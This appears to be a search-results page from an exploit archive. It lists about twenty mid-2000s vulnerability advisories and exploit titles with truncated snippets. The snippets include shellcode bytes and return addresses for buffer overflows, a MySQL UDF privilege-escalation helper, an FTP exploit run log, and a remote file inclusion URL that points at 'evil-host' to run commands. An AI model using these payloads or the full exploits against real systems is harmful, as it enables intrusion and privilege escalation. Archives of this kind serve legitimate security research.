1634 matches found
Portcullis Security Advisory 05-004
Portcullis Security Advisory Vulnerable System: MediaPartner 5.0 Vulnerability Title: In Place Password Update Process Flawed Vulnerability discovery and development: Portcullis Security Testing Service Affected systems: Emotion MediaPartner Web Server Version 5.0 5.1 not confirmed Details: The...
[EXPL] iWebNegar Configuration Nullification (DoS)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)
/ $Id: raptorudf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $ raptorudf.c - dynamic library for dosystem MySQL UDF Copyright c 2004 Marco Ivaldi This is an helper dynamic library for local privilege escalation through MySQL run with root privileges very bad idea!. Tested on MySQL 4.0.17. Code ripped...
Seattle Lab Mail (SLmail) 5.5 - POP3 PASS Remote Buffer Overflow (2)
Seattle Lab Mail SLmail 5.5 - POP3 PASS Remote Buffer Overflow 2 include include include include include include include include include include define retadd "\x9f\x45\x3a\x77" /win2k server sp4 0x773a459f/ define port 110 / revshell Iraq hackers group/ char shellcode =...
AIX 5.1 < 5.3 - paginit Local Stack Overflow
/ exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart / define RETADDR 0x2ff22c90 char shellcode = "\x7c\xa5\x2a\x79" "\x40\x82\xff\xfd" "\x7c\xa8\x02\xa6"...
Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit
No description provided by source. / RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit. DATE: 12.15.2004 Vuln Advisory : Hongzhen Zhoufelixzhou at hotmail dot com Exploit Writer : x90cKyong [email protected]/jyj9782 Testing -----------------------------------------------...
wget 1.9 - Directory Traversal
wget 1.9 - Directory Traversal !/usr/bin/perl -W wgettrap.poc -- A POC for the wget1 directory traversal vulnerability Copyright 2004 Jan Minář jjminar fastmail fm License: Public Domain When wget connects to us, we send it a HTTP redirect constructed so that wget wget will connect the second...
Blog Torrent preview 0.8 - arbitrary file download
Intro ----- Blogtorrent is a collection of PHP scripts which are designed to make it simple to host files for transfer via bittorrent. Whilst it is not normal to report security problems in "preview" releases of software this software was covered prominently upon Slashdot and could be widely used...
Aspell (word-list-compress) Command Line Stack Overflow
Exploit for linux platform in category local exploits ======================================================= Aspell word-list-compress Command Line Stack Overflow ======================================================= / Fuck private exploits . Fuck iranian hacking and security !! teams who are...
WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit
No description provided by source. / no@0x00:/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test Ipswitch WSFTP Remote buffer overflow exploit by NoPh0BiA. x Connected to: 10.20.30.2 on port 21. x Sending Login..done. x Sending bad code..done. x Checking if exploitation was successful.. ...
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET, socket.SOCKSTREAM Lame calc.exe shellcode - dont expect...
technote-commandexec.txt
Technote Command Execution Technote Inc. from Korea offers a Site Package which includes a web board. Previous exploit discovered way back on year 2000 focused on a File Disclosure Vulnerability http://www.securityfocus.com/bid/2156/discussion/ However, command execution is also possible using the...
phpWebSite 0.7.30.8.x0.9.3 - User Module HTTP Response Splitting
phpWebSite 0.7.30.8.x0.9.3 - User Module HTTP Response Splitting source: https://www.securityfocus.com/bid/11673/info A remote HTTP response splitting vulnerability reportedly affects phpWebSite in its user module. This issue is due to a failure of the application to properly sanitize user-suppli...
stackShell.txt
hi, im posting here a manner for avoiding stackguard. Shellcode without zeros. // /Shellcode avoiding stack protections sample--------Vallez/29a/ // / All we have listened about stack protections. Security products are protecting stacks of code executed there. New hardware too, that will not let...
libxml 2.6.12 nanoftp - Local Buffer Overflow
libxml 2.6.12 nanoftp - Local Buffer Overflow / libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom n00b localho outernet gcc -Wall libsuxml.c -lxml2 n00b localho outernet ./a.out Usage: ./a.out align n00b localho outernet netstat -ant | grep 7000 n00b localho outernet ./a.out 0xbfff0360...
libxml 2.6.12 nanoftp - Local Buffer Overflow
/ libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom n00b localho outernet gcc -Wall libsuxml.c -lxml2 n00b localho outernet ./a.out Usage: ./a.out align n00b localho outernet netstat -ant | grep 7000 n00b localho outernet ./a.out 0xbfff0360 xmlNanoFTPScanURL: Use IPv6/IPv4 format n00b...
SLX Server 6.1 Arbitrary File Creation Exploit (PoC)
No description provided by source. !/usr/bin/perl Proof of concept exploit: Arbitrary file creation for SLX server 6.1 Written by Carl Livitt, Agenda Security Services, June 2004. This exploit abuses the ProcessQueueFile command on SLX 6.1 others? servers to create arbitrary files on the filesyst...
ocPortal 1.0.3 - Remote File Inclusion
ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put script funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host supports php. '; ?...
ocPortal 1.0.3 - Remote File Inclusion
http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put script funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host supports php. '; ? http://localhost/ocp-103/index.php?reqpath=http://evil-host/&com=ls milw0rm.com...
Multiple vulnerabilities in BlackBoard
Multiple vulnerabilities in BlackBoard AuThor:Cracklove emA!l:CrackloveatGmaildotCom HoMePaGe:http://ProxySky.com Info Website: http://blackboard.unclassified.de Version: 1.5.1,Maybe prior Problem: Full path disclosure,Include file Vuls 1.Full path disclosure: Let's try to request like this:...